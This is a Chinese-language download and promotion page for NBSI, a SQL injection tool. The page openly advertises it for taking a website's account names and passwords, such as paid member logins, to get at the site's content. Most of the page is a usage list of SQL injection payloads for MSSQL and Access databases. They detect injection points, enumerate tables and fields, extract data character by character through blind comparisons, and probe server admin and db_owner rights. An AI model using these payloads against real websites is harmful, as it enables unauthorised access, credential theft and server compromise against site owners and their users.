NBSI新版下载地址直达

软件介绍

NBSI（网站漏洞检测工具）是一款操作简单、功能实用的网站漏洞扫描、检测以及注入工具，由VB语言编写而成，能够版主用户快速获取网站的账号和密码，例如网站的黄金会员密码和账号，即可该网站内的所有视频资源，方便实用，功能十分强大。

软件功能

同时它是一款由VB语言编写的网站漏洞检测工具的名称，ASP注入漏洞检测工具，特别在SQL Server注入检测方面有极高的准确率。

用户提交的数据过滤不足，都可能产生这个漏洞，而攻击原理就是利用用户提交或可修改的数据，把想要的SQL语句插入到系统实际SQL语句中，轻则获得敏感的信息，重则控制服务器。

使用说明

1.判断是否有注入

;and 1=1

;and 1=2

2.初步判断是否是mssql

;and user>0

3.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

4.注入参数是字符

'and [查询条件] and ''='

5.搜索时没过滤参数的

'and [查询条件] and '%25'='

6.猜数据库

;and (Select Count(*) from [数据库名])>0

7.猜字段

;and (Select Count(字段名) from 数据库名)>0

8.猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）

;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(SELECT IS_MEMBER('db_owner'));--

软件评测

NBSI（网站漏洞检测工具）的功你十分强大，操作也比较简单，能够快速对指定的URL的SQL注入漏洞，获取账号和密码。